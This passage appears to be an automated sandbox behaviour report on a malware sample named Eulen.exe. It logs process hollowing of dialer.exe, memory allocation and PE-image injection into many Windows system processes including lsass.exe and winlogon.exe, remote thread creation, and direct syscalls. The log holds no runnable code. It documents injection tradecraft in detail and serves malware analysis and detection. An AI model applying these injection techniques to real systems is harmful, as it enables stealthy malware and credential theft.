          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19985DA0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 23C03DC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2AFCF1D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C09C9C0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 247BA250000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 276A09D0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3F50000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D742A40000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1D1D4C70000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 17E6C720000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1D2B1A80000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 238A5DD0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 23606140000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\powercfg.exe base: 26FCFC60000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\powercfg.exe base: 1E7F15B0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647341DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,14_2_00007FF647341DB4
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 91722908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: BDCB2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 709A2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: B1592908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: EFFC2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: AFB82908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F7B2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C382908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 82762908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 1B1D2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6AD42908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: D3CA2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 73D32908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 21B2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: B9FD2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 54D82908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 57DA2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe EIP: E3EE2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 33B42908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 74532908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 15742908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C8542908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 212A2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6D542908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D8952908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4332908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E72908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19362908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 31802908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD9B2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA1C2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D52908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D2562908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5192908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1A02908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B0C12908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E5A2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC6C2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FAC2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A932908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 88F92908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 857C2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEDC2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A2112908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9D92908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBEC2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7C622908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 59752908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB592908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F95A2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9EEE2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2B2E2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC6E2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8792908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 14DD2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 44F72908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2ED52908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E6AF2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 84C22908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A0712908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DDB2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F4C92908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A5112908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ACF2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 85DA2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7CDE2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 94182908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 54372908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3DC2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CF1D2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9C9C2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BA252908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A09D2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe EIP: E3F52908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 42A42908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D4C72908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A5DD2908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\Conhost.exe EIP: 6142908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CFC62908Jump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F15B2908Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtQuerySystemInformation: Direct from: 0x7FF6DE66798EJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtOpenFile: Direct from: 0x7FF6E356A03EJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtMapViewOfSection: Direct from: 0x7FF6E4D93C54Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E3564720Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E2A7BA1FJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtMapViewOfSection: Direct from: 0x7FF60B9A34DF
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E355976BJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E330DD2AJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E4DA4205Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtClose: Direct from: 0x7FF6E2A79447
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60B9C48B8
          Source: C:\Users\user\Desktop\Eulen.exeNtQuerySystemInformation: Direct from: 0x7FF6E4DA43BEJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtQuerySystemInformation: Direct from: 0x7FF60BC109D7
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtQuerySystemInformation: Direct from: 0x7FF60B994E41
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E4DBB206Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtUnmapViewOfSection: Direct from: 0x7FF6E4D72A0CJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E2A9A866Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E4DCACC3Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E4DA098CJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60B14322A
          Source: C:\Users\user\Desktop\Eulen.exeNtQuerySystemInformation: Direct from: 0x7FF6E32B0ECBJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtQuerySystemInformation: Direct from: 0x7FF6E3302A6FJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60B9C31DA
          Source: C:\Users\user\Desktop\Eulen.exeNtQuerySystemInformation: Direct from: 0x7FF6E2A8D0D7Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60D4A58DC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtQuerySystemInformation: Direct from: 0x7FF60B99A4E6
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Indirect: 0x7FF6E2A4E235Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E32F1046Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60B14BA1F
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60B16A866
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtAdjustPrivilegesToken: Direct from: 0x7FF606D3798E
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60B9B6DA1
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E2A79440Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtClose: Direct from: 0x7FF60D46679B
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E4D76EFCJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtQuerySystemInformation: Direct from: 0x7FF60B9C7AEC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60D47098C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Indirect: 0x7FF60B11E235
          Source: C:\Users\user\Desktop\Eulen.exeNtProtectVirtualMemory: Direct from: 0x7FF6E355DA1EJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtUnmapViewOfSection: Direct from: 0x7FF60B9C436A
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeNtProtectVirtualMemory: Direct from: 0x7FF60D49ACC3
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1590000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22382760000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3EE0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0C10000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E5A0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8790000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 23C03DC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2AFCF1D0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C09C9C0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 247BA250000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 276A09D0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3F50000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D742A40000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D1D4C70000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 17E6C720000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D2B1A80000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 238A5DD0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 23606140000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\powercfg.exe base: 26FCFC60000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\powercfg.exe base: 1E7F15B0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: PID: 4084 base: 8790000 value: 4DJump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeSection loaded: NULL target: unknown protection: readonly
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeSection loaded: NULL target: unknown protection: readonly
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeSection loaded: NULL target: unknown protection: readonly
          Source: C:\Users\user\Desktop\Eulen.exeThread register set: target process: 8080Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeThread register set: target process: 7172
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeThread register set: target process: 5072
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeThread register set: target process: 6080
          Source: C:\Users\user\Desktop\Eulen.exeMemory written: C:\Windows\System32\dialer.exe base: D3159B010Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1590000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000Jump to behavior
